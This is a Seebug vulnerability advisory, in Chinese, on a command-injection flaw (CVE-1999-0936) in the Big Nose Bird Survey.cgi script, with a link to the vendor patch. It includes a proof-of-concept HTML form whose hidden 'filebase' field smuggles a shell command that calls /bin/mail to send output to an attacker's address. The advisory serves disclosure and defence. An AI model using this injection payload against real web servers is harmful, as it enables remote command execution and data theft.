Lucene search
RootSSV:4295HistoryOct 25, 2008 - 12:00 a.m.
BNB Survey.cgi脚本远程执行任意命令漏洞
2008-10-2500:00:00
Root
www.seebug.org
24
EPSS
0.005
Percentile
76.2%
BugCVE: CVE-1999-0936
BUGTRAQ: 1817
Survey.cgi是Big Nose Bird提供的一个基于Web的用于调查问卷的脚本。Survey.cgi实现上存在一个输入验证漏洞,远程攻击者可能利用此漏洞在主机上以Web进程的权限执行任意命令。
脚本对于用户输入未做充分过滤,攻击者可能在输入中混入“|”、“>”、“<”等Shell管道符或重定向符来执行Shell命令。
1.0
Big Nose Bird
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Big Nose Bird BNBSurvey 1.0:
Big Nose Bird Upgrade BNBSurvey
<a href=“ftp://ftp.bignosebird.com/survey.zip” target=“_blank”>ftp://ftp.bignosebird.com/survey.zip</a>
<FORM METHOD= POST ACTION= www.victim.com/cgi-bin/survey.cgi >
<input type=hidden name=action value= VOTE >
<input type=hidden name=filebase value= bleh; /bin/mail you@your_email_address.com
<PRE>
Your Gender
<input type=radio name=ITEM1 value= 0 >Male
<input type=radio name=ITEM1 value= 1 >Female
<input type=radio name=ITEM1 value= 2 >Neuter
<INPUT TYPE= submit VALUE= VOTE! >
Related
cvelist
cvelist
CVE-1999-0936
2000-01-04 05:00:00
cve
cve
CVE-1999-0936
2000-01-04 05:00:00
openvas
openvas
Detection of various dangerous CGI scripts (HTTP) - Active Check
2005-11-03 00:00:00
nessus
nessus
Multiple Dangerous CGI Script Detection
2003-06-17 00:00:00